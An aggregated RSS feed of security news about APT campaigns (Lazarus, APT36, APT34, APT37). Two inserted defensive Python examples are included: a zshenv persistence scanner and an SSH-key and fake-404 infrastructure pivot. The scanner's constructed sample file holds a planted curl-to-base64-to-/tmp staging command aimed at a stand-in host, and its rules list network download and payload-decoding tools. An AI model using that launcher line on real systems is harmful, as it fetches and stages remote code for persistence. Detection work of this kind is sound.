www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2025-05-10T22:57:36+00:00 www.secnews.physaphae.fr
SecureMac - Security focused on MAC: BlueNoroff
Also known as HEUR:Trojan-Downloader.OSX.Lazarus.gen. Type: Hybrid Threat. Platform: Mac OS 9. Last updated: 11/28/24 7:01 am. Threat Level: High.
Description: This malware installs a backdoor for remote command execution and abuses the zshenv configuration file for persistence, bypassing macOS security mechanisms such as Login Items notifications.
BlueNoroff Threat Removal: MacScan can detect and remove the BlueNoroff Hybrid Threat from your system, as well as provide protection against other security and privacy threats. A 30-day trial is available to scan your system for this threat. Download MacScan
2025-05-07T10:17:41+00:00 https://www.securemac.com/definitions/BlueNoroff www.secnews.physaphae.fr/article.php?IdArticle=8672872 False Malware,Threat APT 38 2.0000000000000000
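The persistence trick named in the definition above deserves a concrete check. zsh sources /etc/zshenv and then ~/.zshenv for every zsh process, interactive or not (unlike .zshrc or .zprofile), so a command planted there re-runs whenever any script, Terminal tab or tool spawns zsh, and there is no LaunchAgent or Login Item for macOS to notify the user about. The scanner below is an added example and is not SecureMac's or MacScan's code: it applies a handful of heuristic rules to the two startup files and flags lines that look like a launcher rather than environment setup. The rules and the two sample files are this example's own, constructed for illustration; a hit is a reason to read the file, not proof of compromise.

```python
"""Heuristic scan of zsh startup files for planted persistence (added example)."""
import os
import re
from typing import List, Tuple

# (pattern, reason). Each rule is a hint worth a look, not proof of compromise.
RULES = [
    (re.compile(r"\b(curl|wget)\b"), "downloads from the network at shell start"),
    (re.compile(r"\bbase64\s+(-d|-D|--decode)\b"), "decodes an embedded payload"),
    (re.compile(r"\b(eval|exec)\s+[\"'$`(]"), "evaluates generated code"),
    (re.compile(r"\bnohup\b|(?<![&|>])&\s*$"), "backgrounds a process"),
    (re.compile(r"\bosascript\b|\bpython3?\s+-c\b|\bperl\s+-e\b"), "runs an inline script interpreter"),
    (re.compile(r"\bxattr\s+-[a-z]*d\b.*com\.apple\.quarantine"), "strips the quarantine attribute"),
    (re.compile(r"(?:^|[\s=\"'(])(?:/private)?(?:/tmp|/var/tmp|/Users/Shared)/\S+"),
     "references a world-writable staging directory"),
]

# Files zsh reads unconditionally; the system-wide one needs root to modify.
STARTUP_FILES = ["/etc/zshenv", os.path.expanduser("~/.zshenv")]


def scan_zshenv(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, line, reason) for every rule hit in `text`."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for pattern, reason in RULES:
            if pattern.search(line):
                findings.append((lineno, line, reason))
    return findings


def suspicious_lines(text: str) -> List[int]:
    """Sorted, de-duplicated line numbers that triggered at least one rule."""
    return sorted({lineno for lineno, _, _ in scan_zshenv(text)})


# Constructed samples: a typical benign file and a planted launcher.
BENIGN = """\
# added by the Rust installer
export PATH="$HOME/.cargo/bin:/opt/homebrew/bin:$PATH"
export EDITOR=vim
. "$HOME/.cargo/env"
"""

PLANTED = """\
export PATH="/usr/local/bin:$PATH"
( nohup /Users/Shared/.cache/updater >/dev/null 2>&1 & )
curl -fsSL https://example.invalid/stage | base64 -d > /tmp/.s && chmod +x /tmp/.s
"""


def main() -> None:
    """Scan the real startup files on this machine and print every hit."""
    for path in STARTUP_FILES:
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, line, reason in scan_zshenv(fh.read()):
                print(f"{path}:{lineno}: {reason}: {line}")


if __name__ == "__main__":
    main()
```

Run it as a normal user to check ~/.zshenv, and with sudo if /etc/zshenv is unreadable; on the constructed samples the benign file produces no hits and the planted file flags lines 2 and 3 five times in total. Backgrounding a binary from a hidden directory is the rule most likely to matter in practice, since a PATH export is the only thing most legitimate zshenv files ever contain.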
GB Hacker - Reverser's blog: Hackers Use Pahalgam Attack-Themed Decoys to Target Indian Government Officials
The Seqrite Labs APT team has uncovered a sophisticated cyber campaign by the Pakistan-linked Transparent Tribe (APT36) targeting Indian Government and Defense personnel. This operation, centered around the recent Pahalgam terror attack on April 22, 2025, leverages emotionally charged themes to distribute phishing documents and deploy malicious payloads. Exploiting Geopolitical Tensions for Cyber Espionage The […]
2025-05-05T15:05:25+00:00 https://gbhackers.com/hackers-use-pahalgam-attack-themed-decoys/ www.secnews.physaphae.fr/article.php?IdArticle=8671869 False None APT 36 3.0000000000000000
Mandiant - Mandiant security blog: Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis
Executive Summary
Google Threat Intelligence Group (GTIG) tracked 75 zero-day vulnerabilities exploited in the wild in 2024, a decrease from the number we identified in 2023 (98 vulnerabilities), but still an increase from 2022 (63 vulnerabilities). We divided the reviewed vulnerabilities into two main categories: end-user platforms and products (e.g., mobile devices, operating systems, and browsers) and enterprise-focused technologies, such as security software and appliances.
Vendors continue to drive improvements that make some zero-day exploitation harder, demonstrated by both dwindling numbers across multiple categories and reduced observed attacks against previously popular targets. At the same time, commercial surveillance vendors (CSVs) appear to be increasing their operational security practices, potentially leading to decreased attribution and detection. We see zero-day exploitation targeting a greater number and wider variety of enterprise-specific technologies, although these technologies still remain a smaller proportion of overall exploitation when compared to end-user technologies. While the historic focus on the exploitation of popular end-user technologies and their users continues, the shift toward increased targeting of enterprise-focused products will require a wider and more diverse set of vendors to increase proactive security measures in order to reduce future zero-day exploitation attempts.
Scope
This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2024. We discuss how targeted vendors and exploited products drive trends that reflect threat actor goals and shifting exploitation approaches, and then closely examine several examples of zero-day exploitation from 2024 that demonstrate how actors use both historic and novel techniques to exploit vulnerabilities in targeted products. The following content leverages original research conducted by GTIG, combined with breach investigation findings and reporting from reliable open sources, though we cannot independently confirm the reports of every source. Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents through digital forensic investigations. The numbers presented here reflect our best understanding of current data. GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available. GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days. Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation.
Key Takeaways
Zero-day exploitation continues to grow gradually. The 75 zero-day vulnerabilities exploited in 2024 follow a pattern that has emerged
2025-04-29T05:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/2024-zero-day-trends/ www.secnews.physaphae.fr/article.php?IdArticle=8669387 False Malware,Tool,Vulnerability,Threat,Patching,Mobile,Prediction,Cloud,Commercial APT 37 2.0000000000000000
GB Hacker - Reverser's blog: North Korean APT Hackers Pose as Companies to Spread Malware to Job Seekers
Silent Push Threat Analysts have uncovered a chilling new cyberattack campaign orchestrated by the North Korean Advanced Persistent Threat (APT) group known as Contagious Interview, also referred to as Famous Chollima, a subgroup of the notorious Lazarus group. This state-sponsored entity has been implicated in numerous sophisticated cyber-espionage efforts targeting global industries, with a particular […]
2025-04-25T17:34:28+00:00 https://gbhackers.com/north-korean-apt-hackers-pose-as-companies/ www.secnews.physaphae.fr/article.php?IdArticle=8667769 False Malware,Threat APT 38 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Lazarus Hits 6 South Korean Firms via Cross EX, Innorix Zero-Day and ThreatNeedle Malware
At least six organizations in South Korea have been targeted by the prolific North Korea-linked Lazarus Group as part of a campaign dubbed Operation SyncHole. The activity targeted South Korea's software, IT, financial, semiconductor manufacturing, and telecommunications industries, according to a report from Kaspersky published today. The earliest evidence of compromise was first detected in
2025-04-24T19:41:00+00:00 https://thehackernews.com/2025/04/lazarus-hits-6-south-korean-firms-via.html www.secnews.physaphae.fr/article.php?IdArticle=8667217 False Malware,Vulnerability,Threat APT 38 3.0000000000000000
GB Hacker - Reverser's blog: Lazarus APT Targets Organizations by Exploiting One-Day Vulnerabilities
A recent cyber espionage campaign by the notorious Lazarus Advanced Persistent Threat (APT) group, tracked as "Operation SyncHole," has compromised at least six South Korean organizations across software, IT, financial, semiconductor, and telecommunications sectors since November 2024. According to detailed research, the attackers employed a combination of watering hole attacks and exploited vulnerabilities in widely […]
2025-04-24T17:07:50+00:00 https://gbhackers.com/lazarus-apt-targets-organizations/ www.secnews.physaphae.fr/article.php?IdArticle=8667290 False Vulnerability,Threat APT 38 3.0000000000000000
Bleeping Computer - American magazine: Lazarus hackers breach six companies in watering hole attacks
In a recent espionage campaign, the infamous North Korean threat group Lazarus targeted multiple organizations in the software, IT, finance, and telecommunications sectors in South Korea. [...]
2025-04-24T15:13:32+00:00 https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-six-companies-in-watering-hole-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8667329 False Threat APT 38 3.0000000000000000
Global Security Mag - French news site: Kaspersky discovers new cyberattacks by Lazarus targeting South Korean supply chains
Malwares
2025-04-24T09:27:52+00:00 https://www.globalsecuritymag.fr/kaspersky-decouvre-de-nouvelles-cyberattaques-menees-par-lazarus-visant-les.html www.secnews.physaphae.fr/article.php?IdArticle=8667081 False None APT 38 3.0000000000000000
Kaspersky - Kaspersky Research blog: Operation SyncHole: Lazarus APT goes back to the well
Kaspersky GReAT experts uncovered a new campaign by Lazarus APT that exploits vulnerabilities in South Korean software products and uses a watering hole approach.
2025-04-24T05:00:04+00:00 https://securelist.com/operation-synchole-watering-hole-attacks-by-lazarus/116326/ www.secnews.physaphae.fr/article.php?IdArticle=8666967 False Vulnerability APT 38 3.0000000000000000
GB Hacker - Reverser's blog: APT34 Hackers Use Port 8080 for Fake 404 Responses and Shared SSH Keys
Researchers have uncovered early indicators of malicious infrastructure linked to APT34, also known as OilRig, a suspected Iranian threat group notorious for targeting sectors like education, government, energy, telecom, and NGOs. Between November 2024 and April 2025, a series of domains and servers were tracked, impersonating an academic organization in Iraq (biam-iraq[.]org) and fictitious UK-based […]
2025-04-23T11:02:35+00:00 https://gbhackers.com/apt34-hackers-use-port-8080-for-fake-404-responses/ www.secnews.physaphae.fr/article.php?IdArticle=8666596 False Threat APT 34 3.0000000000000000
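Two of the indicators in the article above, servers answering on port 8080 with a 404 and servers that share SSH keys, are properties an Internet-wide scan dataset exposes, which is how such infrastructure gets spotted early. The script below is an added example and is not code from GB Hacker or the underlying research: it clusters scan records by SSH host-key fingerprint and by the exact body of the port-8080 404 response, then intersects the two clusters, because either signal alone is noisy (stock web-server 404 pages are identical across unrelated hosts, and servers cloned from one VM image share a host key). The record format, the hosts (TEST-NET addresses) and the fingerprints are constructed placeholders, not APT34 indicators.

```python
"""Pivot on shared SSH host keys and identical fake-404 bodies (added example)."""
import hashlib
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class ScanRecord:
    host: str
    ssh_fingerprint: Optional[str] = None                         # SHA256 host-key fingerprint
    http: Dict[int, Tuple[int, str]] = field(default_factory=dict)  # port -> (status, body)


def body_hash(body: str) -> str:
    """Short digest of a response body, used as a cluster key."""
    return hashlib.sha256(body.encode("utf-8")).hexdigest()[:16]


def cluster_by_ssh_key(records: List[ScanRecord]) -> Dict[str, List[str]]:
    """Fingerprint -> hosts, keeping only fingerprints seen on more than one host."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for rec in records:
        if rec.ssh_fingerprint:
            groups[rec.ssh_fingerprint].append(rec.host)
    return {fp: sorted(hosts) for fp, hosts in groups.items() if len(hosts) > 1}


def cluster_by_404_body(records: List[ScanRecord], port: int = 8080) -> Dict[str, List[str]]:
    """Body digest -> hosts that answered `port` with a 404 carrying that exact body."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for rec in records:
        resp = rec.http.get(port)
        if resp and resp[0] == 404:
            groups[body_hash(resp[1])].append(rec.host)
    return {digest: sorted(hosts) for digest, hosts in groups.items() if len(hosts) > 1}


def pivot(records: List[ScanRecord], port: int = 8080) -> List[str]:
    """Hosts that fall into both a shared-key cluster and a shared-404 cluster."""
    key_hosts = {h for hosts in cluster_by_ssh_key(records).values() for h in hosts}
    web_hosts = {h for hosts in cluster_by_404_body(records, port).values() for h in hosts}
    return sorted(key_hosts & web_hosts)


# Constructed dataset. NGINX_404 stands in for a stock error page that many
# unrelated hosts return; CUSTOM_404 is a minimal body a C2 might serve to
# anything that is not its own implant.
NGINX_404 = ("<html><head><title>404 Not Found</title></head>"
             "<body><center><h1>404 Not Found</h1></center></body></html>")
CUSTOM_404 = "404"
SHARED_KEY = "SHA256:AAAAexamplefingerprintAAAA"

RECORDS = [
    ScanRecord("203.0.113.10", SHARED_KEY, {8080: (404, CUSTOM_404)}),
    ScanRecord("203.0.113.11", SHARED_KEY, {8080: (404, CUSTOM_404)}),
    ScanRecord("203.0.113.12", SHARED_KEY, {80: (200, "<html>site</html>")}),  # same key, no 8080 listener
    ScanRecord("198.51.100.20", "SHA256:BBBBuniqueBBBB", {8080: (404, NGINX_404)}),
    ScanRecord("198.51.100.21", "SHA256:CCCCuniqueCCCC", {8080: (404, NGINX_404)}),
]

if __name__ == "__main__":
    print("shared SSH keys :", cluster_by_ssh_key(RECORDS))
    print("shared 404 body :", cluster_by_404_body(RECORDS))
    print("pivot hits      :", pivot(RECORDS))
```

On the constructed data the two nginx-style hosts cluster on body alone and the third shared-key host clusters on key alone; only 203.0.113.10 and 203.0.113.11 survive the intersection. With real scan exports the same functions work unchanged once the records are loaded, and the third host is still worth a note: a shared key with no 8080 listener yet is exactly what a server staged but not yet activated looks like.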
Schneier on Security - American cryptologist and researcher: Friday Squid Blogging: Live Colossal Squid Filmed
A live colossal squid was filmed for the first time in the ocean. It's only a juvenile: a foot long. As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.
2025-04-18T21:02:33+00:00 https://www.schneier.com/blog/archives/2025/04/friday-squid-blogging-live-colossal-squid-filmed.html www.secnews.physaphae.fr/article.php?IdArticle=8664628 False None APT 32 2.0000000000000000
The State of Security - American magazine: APT Rogues' Gallery: The World's Most Dangerous Cyber Adversaries
Advanced Persistent Threat (APT) groups are not a new scourge. These sophisticated, state-sponsored cyber adversaries, with deep pockets and highly advanced technical skills, conduct prolonged and targeted attacks to infiltrate networks, exfiltrate sensitive data, and disrupt critical infrastructure. The stakes have never been higher, so in this blog, we'll look at some of the most notorious APT actors, their unique Tactics, Techniques, and Procedures (TTPs), and attacks attributed to them, and offer a few tips on how to defend against them. The Lazarus Group Originating from North Korea, the...
2025-04-16T02:46:50+00:00 https://www.tripwire.com/state-of-security/apt-rogues-gallery-worlds-most-dangerous-cyber-adversaries www.secnews.physaphae.fr/article.php?IdArticle=8663404 False Threat,Technical APT 38 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Lazarus Group Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware
The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by
2025-04-03T17:52:00+00:00 https://thehackernews.com/2025/04/lazarus-group-targets-job-seekers-with.html www.secnews.physaphae.fr/article.php?IdArticle=8660049 False Malware,Threat APT 38 3.0000000000000000
SecurityWeek - Security News: Lazarus Uses ClickFix Tactics in Fake Cryptocurrency Job Attacks
North Korea's Lazarus hackers are using the ClickFix technique for malware deployment in fresh attacks targeting the cryptocurrency ecosystem.
2025-04-02T10:45:54+00:00 https://www.securityweek.com/lazarus-uses-clickfix-tactics-in-fake-cryptocurrency-job-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8659799 False Malware APT 38 3.0000000000000000
Dark Reading - Informationweek Branch: Lazarus APT Jumps on ClickFix Bandwagon in Recent Attacks
A continuation of the North Korean nation-state threat's campaign against employment seekers uses the social engineering attack to target CeFi organizations with the GolangGhost backdoor.
2025-04-01T13:21:21+00:00 https://www.darkreading.com/cyberattacks-data-breaches/lazarus-apt-clickfix-bandwagon-attacks www.secnews.physaphae.fr/article.php?IdArticle=8659619 False Threat APT 38 2.0000000000000000
InfoSecurity Mag - InfoSecurity Magazine: ClickFake Interview Campaign by Lazarus Targets Crypto Job Seekers
New "ClickFake Interview" campaign attributed to the Lazarus Group targets crypto professionals with fake job offers
2025-03-31T15:00:00+00:00 https://www.infosecurity-magazine.com/news/clickfake-interview-campaign/ www.secnews.physaphae.fr/article.php?IdArticle=8659410 False None APT 38 3.0000000000000000
Bleeping Computer - American magazine: North Korean hackers adopt ClickFix attacks to target crypto firms
The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi). [...]
2025-03-31T11:56:54+00:00 https://www.bleepingcomputer.com/news/security/north-korean-hackers-adopt-clickfix-attacks-to-target-crypto-firms/ www.secnews.physaphae.fr/article.php?IdArticle=8659416 False Malware APT 38 3.0000000000000000
Schneier on Security - American cryptologist and researcher: Friday Squid Blogging: Squid Werewolf Hacking Group
In another rare squid/cybersecurity intersection, APT37 is also known as "Squid Werewolf." As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.
2025-03-28T21:04:42+00:00 https://www.schneier.com/blog/archives/2025/03/friday-squid-blogging-squid-werewolf-hacking-group.html www.secnews.physaphae.fr/article.php?IdArticle=8658955 False None APT 37 3.0000000000000000
Dark Reading - Informationweek Branch: Iran's MOIS-Linked APT34 Spies on Allies Iraq & Yemen
The Islamic Republic is keeping its enemies close and its friends closer, with espionage attacks aimed at nearby neighbors.
2025-03-28T06:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/irans-mois-linked-apt34-spies-allies-iraq-yemen www.secnews.physaphae.fr/article.php?IdArticle=8658775 False None APT 34 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): APT36 Spoofs India Post Website to Infect Windows and Android Users with Malware
An advanced persistent threat (APT) group with ties to Pakistan has been attributed to the creation of a fake website masquerading as India's public sector postal system as part of a campaign designed to infect both Windows and Android users in the country. Cybersecurity company CYFIRMA has attributed the campaign with medium confidence to a threat actor called APT36, which is also known as
2025-03-27T18:01:00+00:00 https://thehackernews.com/2025/03/apt36-spoofs-india-post-website-to.html www.secnews.physaphae.fr/article.php?IdArticle=8658566 False Malware,Threat,Mobile APT 36 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): U.S. Treasury Lifts Tornado Cash Sanctions Amid North Korea Money Laundering Probe
The U.S. Treasury Department has announced that it's removing sanctions against Tornado Cash, a cryptocurrency mixer service that has been accused of aiding the North Korea-linked Lazarus Group to launder their ill-gotten proceeds. "Based on the Administration's review of the novel legal and policy issues raised by use of financial sanctions against financial and commercial activity occurring
2025-03-22T13:02:00+00:00 https://thehackernews.com/2025/03/us-treasury-lifts-tornado-cash.html www.secnews.physaphae.fr/article.php?IdArticle=8657361 False Commercial APT 38 2.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): North Korea's ScarCruft Deploys KoSpy Malware, Spying on Android Users via Fake Utility Apps
The North Korea-linked threat actor known as ScarCruft is said to have been behind a never-before-seen Android surveillance tool named KoSpy targeting Korean and English-speaking users. Lookout, which shared details of the malware campaign, said the earliest versions date back to March 2022. The most recent samples were flagged in March 2024. It's not clear how successful these efforts were.
2025-03-13T19:53:00+00:00 https://thehackernews.com/2025/03/north-koreas-scarcruft-deploys-kospy.html www.secnews.physaphae.fr/article.php?IdArticle=8655561 False Malware,Tool,Threat,Mobile APT 37 2.0000000000000000
SecurityWeek - Security News: North Korean Hackers Distributed Android Spyware via Google Play
The North Korea-linked APT37 has been observed targeting Android users with spyware distributed via Google Play.
2025-03-13T12:58:55+00:00 https://www.securityweek.com/north-korean-hackers-distributed-android-spyware-via-google-play/ www.secnews.physaphae.fr/article.php?IdArticle=8655524 False Mobile APT 37 2.0000000000000000
CyberScoop - scoopnewsgroup.com special Cyber: Lazarus Group deceives developers with 6 new malicious npm packages
Socket researchers said the malware-ridden packages were collectively downloaded over 330 times. GitHub removed all of the malicious packages Wednesday.
2025-03-12T22:31:17+00:00 https://cyberscoop.com/lazarus-group-north-korea-malicious-npm-packages-socket/ www.secnews.physaphae.fr/article.php?IdArticle=8655397 False None APT 38 2.0000000000000000
Recorded Future - Recorded Future feed: Spyware in bogus Android apps is attributed to North Korean group
A North Korean nation-state group tracked as APT37 or ScarCruft placed infected utilities in Android app stores as part of an espionage campaign, according to researchers at Lookout.
2025-03-12T15:11:46+00:00 https://therecord.media/north-korea-malware-android-apps-kospy-apt37-scarcruft www.secnews.physaphae.fr/article.php?IdArticle=8655327 False Mobile APT 37 2.0000000000000000
HackRead - Search Cyber: Lazarus Group Hid Backdoor in Fake npm Packages in Latest Attack
Lazarus Group targets developers with malicious npm packages, stealing credentials and crypto and installing a backdoor. Stay alert to protect your projects.
2025-03-12T00:15:21+00:00 https://hackread.com/lazarus-group-backdoor-fake-npm-packages-attack/ www.secnews.physaphae.fr/article.php?IdArticle=8655158 False None APT 38 2.0000000000000000
BBC - BBC News - Technology: North Korean hackers cash out hundreds of millions from $1.5bn ByBit hack
Hackers from the infamous Lazarus Group are in a cat-and-mouse game to launder their stolen funds from the ByBit heist.
2025-03-10T01:11:47+00:00 https://www.bbc.com/news/articles/c2kgndwwd7lo www.secnews.physaphae.fr/article.php?IdArticle=8654807 False Hack APT 38 3.0000000000000000
Detection Engineering - DET security blog, English: Det. Eng. Weekly #105 - I'm assembling a team
Let's take out Lazarus.
2025-03-05T13:03:46+00:00 https://www.detectionengineering.net/p/det-eng-weekly-105-im-assembling www.secnews.physaphae.fr/article.php?IdArticle=8653814 False None APT 38 2.0000000000000000
TechRepublic - Security News US: How North Korea Executed the Largest Crypto Heist Ever
North Korea's Lazarus Group pulled off the $1.5B Bybit hack, making it the biggest crypto heist ever. Here's how they did it, and what's next.
2025-03-03T14:05:24+00:00 https://www.techrepublic.com/article/bybit-hack-north-korea-crypto-heist-2025/ www.secnews.physaphae.fr/article.php?IdArticle=8653050 False Hack APT 38 3.0000000000000000
Recorded Future - Recorded Future feed: FBI urges crypto community to avoid laundering funds from Bybit hack
The bureau attributed the $1.5 billion hack to the North Korean threat actor known as TraderTraitor, or Lazarus, following similar assessments by cybersecurity researchers.
2025-02-27T15:28:39+00:00 https://therecord.media/fbi-bybit-laundering-crypto-warning www.secnews.physaphae.fr/article.php?IdArticle=8651661 False Hack,Threat APT 38 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers
The U.S. Federal Bureau of Investigation (FBI) formally linked the record-breaking $1.5 billion Bybit hack to North Korean threat actors, as the company's CEO Ben Zhou declared a "war against Lazarus." The agency said the Democratic People's Republic of Korea (North Korea) was responsible for the theft of the virtual assets from the cryptocurrency exchange, attributing it to a specific cluster
2025-02-27T12:45:00+00:00 https://thehackernews.com/2025/02/bybit-hack-traced-to-safewallet-supply.html www.secnews.physaphae.fr/article.php?IdArticle=8651510 False Hack,Threat APT 38 3.0000000000000000
InfoSecurity Mag - InfoSecurity Magazine: FBI Confirms North Korea's Lazarus Group as Bybit Crypto Hackers
FBI confirms North Korea's Lazarus Group responsible for Bybit crypto heist
2025-02-27T09:35:00+00:00 https://www.infosecurity-magazine.com/news/fbi-confirms-north-koreas-lazarus/ www.secnews.physaphae.fr/article.php?IdArticle=8651545 False None APT 38 3.0000000000000000
The Register - English news site: Bybit declares war on North Korea's Lazarus crime-ring to regain $1.5B stolen from wallet
Up to $140M in bounty rewards for return of Ethereum allegedly pilfered by hermit nation. Cryptocurrency exchange Bybit, just days after suspected North Korean operatives stole $1.5 billion in Ethereum from it, has launched a bounty program to help recover its funds.…
2025-02-26T23:49:20+00:00 https://go.theregister.com/feed/www.theregister.com/2025/02/26/bybit_lazarus_bounty/ www.secnews.physaphae.fr/article.php?IdArticle=8651414 False None APT 38,APT 37 3.0000000000000000
CyberScoop - scoopnewsgroup.com special Cyber: Crypto analysts stunned by Lazarus Group's capabilities in $1.46B Bybit theft
The amount stolen last week surpasses what the group was able to steal in all of 2024.
2025-02-25T18:49:07+00:00 https://cyberscoop.com/bybit-lazarus-group-north-korea-ethereum/ www.secnews.physaphae.fr/article.php?IdArticle=8650952 False None APT 38 4.0000000000000000
Dark Reading - Informationweek Branch: North Korea's Lazarus Pulls Off Biggest Crypto Heist in History
Cyberattackers believed to be affiliated with the state-sponsored threat group pulled off the largest crypto heist reported to date, stealing $1.5 billion from exchange Bybit. It was carried out by interfering with a routine transfer between wallets.
2025-02-25T10:16:39+00:00 https://www.darkreading.com/cyberattacks-data-breaches/north-korea-lazarus-crypto-heist www.secnews.physaphae.fr/article.php?IdArticle=8650949 False Threat APT 38 4.0000000000000000
Recorded Future - Recorded Future feed: North Korea's Lazarus hackers behind $1.4 billion crypto theft from Bybit, researchers say
Cybersecurity researchers say North Korean hackers are behind the largest cryptocurrency heist in history and are actively laundering the more than $1.4 billion in cryptocurrency stolen from the Bybit exchange on Friday.
2025-02-24T18:28:46+00:00 https://therecord.media/lazarus-hackers-behind-bybit-crypto-heist www.secnews.physaphae.fr/article.php?IdArticle=8650592 False None APT 38 4.0000000000000000
Recorded Future - Recorded Future feed: EU sanctions North Korean tied to Lazarus group over involvement in Ukraine war
The latest package of EU sanctions related to Russia's invasion of Ukraine included the leader of the North Korean intelligence agency known for backing the Lazarus group and other high-profile hacking operations.
2025-02-24T18:25:49+00:00 https://therecord.media/eu-sanctions-north-korea-ukraine-war-lazarus-group www.secnews.physaphae.fr/article.php?IdArticle=8650593 False None APT 38 3.0000000000000000
HackRead - Search Cyber: Investigators Link $1.4B Bybit Hack to North Korea's Lazarus Group
Investigators link the $1.4B Bybit hack to North Korea's Lazarus Group, exposing a major crypto heist tied to state-backed cybercrime and money laundering.
2025-02-23T20:13:39+00:00 https://hackread.com/investigators-link-bybit-hack-north-korea-lazarus-group/ www.secnews.physaphae.fr/article.php?IdArticle=8650283 False Hack APT 38 2.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Lazarus Group Deploys Marstech1 JavaScript Implant in Targeted Developer Attacks
The North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers. The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that's associated with a profile named
2025-02-14T23:58:00+00:00 https://thehackernews.com/2025/02/lazarus-group-deploys-marstech1.html www.secnews.physaphae.fr/article.php?IdArticle=8648530 False Malware,Threat APT 38 2.0000000000000000
InfoSecurity Mag - InfoSecurity Magazine: North Korea Targets Crypto Devs Through NPM Packages
SecurityScorecard has uncovered a sophisticated campaign linked to North Korea's Lazarus Group, distributing crypto-stealing malware
2025-02-13T10:15:00+00:00 https://www.infosecurity-magazine.com/news/north-korea-crypto-devs-npm/ www.secnews.physaphae.fr/article.php?IdArticle=8648337 False Malware APT 38 3.0000000000000000
Mandiant - Mandiant security blog: Cybercrime: A Multifaceted National Security Threat
2025-02-11T20:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat/ www.secnews.physaphae.fr/article.php?IdArticle=8648141 False Ransomware,Malware,Tool,Vulnerability,Threat,Legislation,Medical,Cloud,Technical APT 41,APT 38,APT 29,APT 43,APT 44 3.0000000000000000
InfoSecurity Mag - InfoSecurity Magazine: Lazarus Group Targets Bitdefender Researcher with LinkedIn Recruiting Scam
A Bitdefender researcher was targeted by North Korea's Lazarus with the lure of a fake job offer
2025-02-06T14:50:00+00:00 https://www.infosecurity-magazine.com/news/lazarus-bitdefender-linkedin-scam/ www.secnews.physaphae.fr/article.php?IdArticle=8647224 False None APT 38 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Cross-Platform JavaScript Stealer Targets Crypto Wallets in New Lazarus Group Campaign
The North Korea-linked Lazarus Group has been linked to an active campaign that leverages fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver malware capable of infecting Windows, macOS, and Linux operating systems. According to cybersecurity company Bitdefender, the scam begins with a message sent on a professional social media network, enticing them with the promise of
2025-02-05T20:25:00+00:00 https://thehackernews.com/2025/02/cross-platform-javascript-stealer.html www.secnews.physaphae.fr/article.php?IdArticle=8647065 False Malware APT 38 3.0000000000000000
The Register - English news site: North Koreans clone open source projects to plant backdoors, steal credentials
Stealing crypto is so 2024. Supply-chain attacks leading to data exfil pays off better? North Korea's Lazarus Group compromised hundreds of victims across the globe in a massive secret-stealing supply chain attack that was ongoing as of earlier this month, according to security researchers.…
2025-01-29T23:51:45+00:00 https://go.theregister.com/feed/www.theregister.com/2025/01/29/lazarus_groups_supply_chain_attack/ www.secnews.physaphae.fr/article.php?IdArticle=8644522 False None APT 38 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, right?): Lazarus Group Uses React-Based Admin Panel to Control Global Cyber Attacks
The North Korean threat actor known as the Lazarus Group has been observed leveraging a "web-based administrative platform" to oversee its command-and-control (C2) infrastructure, giving the adversary the ability to centrally supervise all aspects of their campaigns. "Each C2 server hosted a web-based administrative platform, built with a React application and a Node.js API," SecurityScorecard's
2025-01-29T22:26:00+00:00 https://thehackernews.com/2025/01/lazarus-group-uses-react-based-admin.html www.secnews.physaphae.fr/article.php?IdArticle=8644398 False Threat APT 38 3.0000000000000000
Dark Reading - Informationweek Branch: Researchers Uncover Lazarus Group Admin Layer for C2 Servers
The threat actor is using a sophisticated network of VPNs and proxies to centrally manage command and control servers from Pyongyang.
